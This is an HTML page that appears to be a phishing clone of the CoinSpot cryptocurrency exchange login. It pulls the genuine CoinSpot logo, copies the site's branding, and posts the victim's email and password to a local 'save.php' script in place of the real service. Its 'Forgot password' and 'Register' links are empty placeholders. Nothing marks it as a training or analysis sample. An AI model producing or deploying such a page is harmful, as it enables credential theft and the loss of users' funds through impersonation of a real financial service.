<!DOCTYPE html>
<html>
<head>
  <title>CoinSpot Login</title>
  <style>
    body { font-family: Arial; background: #fff; margin: 0; }
    .header { background: #0061FF; color: white; padding: 15px; text-align: left; }
    .header img { height: 30px; vertical-align: middle; }
    .container { padding: 20px; max-width: 400px; margin: auto; }
    input[type=email], input[type=password] {
      width: 100%; padding: 10px; margin: 8px 0; box-sizing: border-box;
    }
    input[type=submit] {
      width: 100%; background: #0061FF; color: white; padding: 10px; border: none; cursor: pointer;
    }
    a { color: #0061FF; text-decoration: none; display: block; margin-top: 10px; }
    label { font-weight: bold; }
  </style>
</head>
<body>
  <div class="header">
    <img src="https://www.coinspot.com.au/images/logos/coinspot-logo.svg" alt="CoinSpot Logo">
  </div>
  <div class="container">
    <h2>Log in to your CoinSpot account</h2>
    <form method="POST" action="save.php">
      <label>Email</label><br>
      <input type="email" name="email" required><br>
      <label>Password</label><br>
      <input type="password" name="password" required><br>
      <input type="checkbox"> Remember my email<br><br>
      <input type="submit" value="Login">
    </form>
    <a href="#">Forgot your password?</a>
    <p>Not a member? <a href="#">Register here</a></p>
  </div>
</body>
</html>
